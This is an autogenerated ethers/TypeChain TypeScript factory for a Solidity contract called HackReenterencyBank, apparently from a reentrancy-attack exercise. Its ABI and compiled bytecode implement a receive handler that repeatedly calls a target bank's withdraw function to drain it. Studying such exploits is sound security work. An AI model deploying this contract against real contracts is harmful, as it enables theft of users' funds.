/* Autogenerated file. Do not edit manually. */
/* tslint:disable */
/* eslint-disable */
import {
  Signer,
  utils,
  Contract,
  ContractFactory,
  PayableOverrides,
} from "ethers";
import type { Provider, TransactionRequest } from "@ethersproject/providers";
import type { PromiseOrValue } from "../../../../common";
import type {
  HackReenterencyBank,
  HackReenterencyBankInterface,
} from "../../../../Reenterency/Step One- Hack/HackBank.sol/HackReenterencyBank";

const _abi = [
  {
    inputs: [
      {
        internalType: "address payable",
        name: "_bankAddress",
        type: "address",
      },
    ],
    stateMutability: "payable",
    type: "constructor",
  },
  {
    inputs: [],
    name: "hackContract",
    outputs: [],
    stateMutability: "nonpayable",
    type: "function",
  },
  {
    stateMutability: "payable",
    type: "receive",
  },
];

const _bytecode =
  "0x6080604052604051610249380380610249833981810160405281019061002591906100ce565b806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550506100fb565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061009b82610070565b9050919050565b6100ab81610090565b81146100b657600080fd5b50565b6000815190506100c8816100a2565b92915050565b6000602082840312156100e4576100e361006b565b5b60006100f2848285016100b9565b91505092915050565b61013f8061010a6000396000f3fe6080604052600436106100225760003560e01c80637ca2474e146100f0576100eb565b366100eb5760008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163111156100e95760008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16633ccfd60b6040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156100d057600080fd5b505af11580156100e4573d6000803e3d6000fd5b505050505b005b600080fd5b3480156100fc57600080fd5b50610105610107565b005b56fea264697066735822122010129ead78d7a0de911faa10d4c36f3a868dc59504eab4ec826c5937d9b51b8d64736f6c634300080f0033";

type HackReenterencyBankConstructorParams =
  | [signer?: Signer]
  | ConstructorParameters<typeof ContractFactory>;

const isSuperArgs = (
  xs: HackReenterencyBankConstructorParams
): xs is ConstructorParameters<typeof ContractFactory> => xs.length > 1;

export class HackReenterencyBank__factory extends ContractFactory {
  constructor(...args: HackReenterencyBankConstructorParams) {
    if (isSuperArgs(args)) {
      super(...args);
    } else {
      super(_abi, _bytecode, args[0]);
    }
  }

  override deploy(
    _bankAddress: PromiseOrValue<string>,
    overrides?: PayableOverrides & { from?: PromiseOrValue<string> }
  ): Promise<HackReenterencyBank> {
    return super.deploy(
      _bankAddress,
      overrides || {}
    ) as Promise<HackReenterencyBank>;
  }
  override getDeployTransaction(
    _bankAddress: PromiseOrValue<string>,
    overrides?: PayableOverrides & { from?: PromiseOrValue<string> }
  ): TransactionRequest {
    return super.getDeployTransaction(_bankAddress, overrides || {});
  }
  override attach(address: string): HackReenterencyBank {
    return super.attach(address) as HackReenterencyBank;
  }
  override connect(signer: Signer): HackReenterencyBank__factory {
    return super.connect(signer) as HackReenterencyBank__factory;
  }

  static readonly bytecode = _bytecode;
  static readonly abi = _abi;
  static createInterface(): HackReenterencyBankInterface {
    return new utils.Interface(_abi) as HackReenterencyBankInterface;
  }
  static connect(
    address: string,
    signerOrProvider: Signer | Provider
  ): HackReenterencyBank {
    return new Contract(address, _abi, signerOrProvider) as HackReenterencyBank;
  }
}
